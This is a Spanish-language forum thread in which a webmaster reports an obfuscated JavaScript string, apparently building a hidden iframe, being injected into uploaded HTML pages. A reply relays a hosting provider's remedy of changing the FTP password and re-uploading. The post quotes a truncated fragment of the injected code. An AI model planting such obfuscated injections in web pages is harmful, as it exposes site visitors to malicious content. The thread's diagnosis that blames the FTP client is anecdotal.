Profitooltip, ¿es un virus?
Hola a todos,
gracias por dedicarme unos minutos a escuchar mi problema.
Al subir un .html a mi web, se añade un javascript del estilo:
var eEEhjZPxBDEkiueTxUaH = "wMiJw60wMiJw105wMiJw102wMiJw114wMiJw97wMiJw109wMiJw101wMiJw32wMiJw119wMiJw105wMiJw100wMiJw116wMiJw104wMiJw61wMiJw34wMiJw52wMiJw56wMiJw48wMiJw34wMi ... etc etc
Me he dado cuenta de esto, pq al mirar la página desde cualquier navegador, mi antivirus me detecta un supuesto malicioso llamado: "Profitooltip.biz"
Al recibir este aviso y al darme cuenta q mi web tiene un scroll horizontal q cuando la maqueté no lo tenía, he ido al "Ver código fuente". Y ha sido entonces cuando he visto el código javascript del cual os hablaba al inicio del mensaje.
¿Le pasa a alguien +? ¿De qué se trata? ¿Cómo hago para q no se añada ese código al subir mis .html? ¿Cómo mato al supuesto virus?
Gracias!!!!
PD: si encuentro respuestas, las postearé aquí!
transparentpixel
Ya tengo respuesta de Cdmon!! Son increiblemente rápidos! Y tienen servicio técnico incluso festivos!! Muy aconsejable alojarse en Cdmon!
Me comentan q posiblemente se ha debido al realizar el FTP desde un programa no seguro, y q seguramente han detectado un agujero y me han inyectado el javascript.
Concretamente lo hice desde Dreamweaver. Me comentan q desde Filezilla no debería tener problemas, q cambiara la contraseña de mi FTP, y volviera a subir el .html desde Filezilla. Efectivamente! Así lo he hecho y ha desaparecido el problema!!
Espero q os sea de ayuda, si os surge el problema
elperroverde
Uff, últimamente hay virus por todas partes... yo por si acaso me he puesto la mascarilla.